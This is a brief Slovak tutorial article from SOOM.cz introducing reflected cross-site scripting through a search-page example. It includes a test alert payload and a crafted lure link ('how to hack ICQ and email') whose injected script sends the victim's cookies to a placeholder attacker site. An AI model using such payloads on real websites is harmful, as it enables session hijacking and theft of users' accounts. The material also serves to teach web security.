Zdroj: SOOM.cz [ISSN 1804-7270] Autor: Anti Datum: 6.11.2006 Hodnocení/Hlasovalo: 2.33/6
V poslednom čase sa rôzne webové aplikácie stavajú obeťou XSS útoku. Čo to vlastne je a ako ho uskutočniť sa dozviete v tomto článku.
Cross-site scripting (XSS alebo CSS) využíva slabé miesto vo webovej aplikácii vďaka ktorému je do nej možne vložiť (škodlivý) kód.
Prestavte si, webovú aplikáciu s vyhľadávaním. Ak klikneme na tlačidlo „HĽADAJ“ aplikácia odošle serveru požiadavku: /hladat.php?najdi=text_ktory_hladame
a ten odpovie stránkou na ktorej sa nachádza: „text_ktory_hladame“.
Čo sa ale stane ak do polička hľadať vložíme nejaký kód ?
Vstup môže vyzerať nejako takto: /hladat.php?najdi=<script>alert(123);</script>
Server odpovie stránkou na ktorej bude: „<script>alert(123);</script>“ a vyskočí javascriptove okno alert.
Ďalším typom útoku môže byť špeciálne upravená URL, ktorá môže vyzerať nasledovne <a href="http://www.stranka.sk/hladat.php?najdi=<
script> document.location.replace(' http://utocnikov web.sk/xss.php?cookie='+docum
ent.cookie);</script>"<Ako hacknut icq a email</a>